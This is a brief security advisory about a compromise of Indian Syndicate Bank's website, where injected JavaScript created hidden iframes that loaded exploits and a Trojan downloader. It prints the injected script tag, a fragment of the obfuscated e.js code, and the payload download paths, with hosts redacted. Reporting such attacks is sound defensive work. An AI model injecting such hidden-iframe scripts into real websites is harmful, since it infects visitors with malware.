Websense® Security LabsT has discovered that the official site for Indian Syndicate Bank (www.syndicatebank.in),
was compromised with a malicious script that attempts to exploit
multiple vulnerabilities. When customers visit the web site, a
malicious JavaScript file (e.js) is executed and creates two additional
iframes in the page.

<script src=http://< URL REMOVED >/e.js></script>

Snippet of js code:

document.writeln(“\/\/xxxx mca By Mr.0wen\/\/”);
document.writeln(“document.write(unescape(\”%3CIFraMe
< URL REMOVED >IFraMe < URL REMOVED
>wIdth%3D%220%22%20heIght%3D

%220%22%20FraMebOrder %3D%220%22%3E%3C\/IFraMe%3E\”));”);
document.writeln(“\/\/xxxx mca By Mr.0wen\/\/”);

The
JavaScript from e.js (seen above) creates two new IFRAME elements
within the page. One IFRAME attempts to load exploit code and the other
creates several additional IFRAMEs that contain advertisement-related
content. The exploit will try to load a Trojan Downloader (qq.exe)
which will contact a remote server to download the following Trojan
Downloader and Backdoor:

http://< URL REMOVED >/hxw/hx/200512.exe
http://< URL REMOVED >/hxw/hx/dd.exe

The site appears to have been cleaned a few hours ago.

 
Details …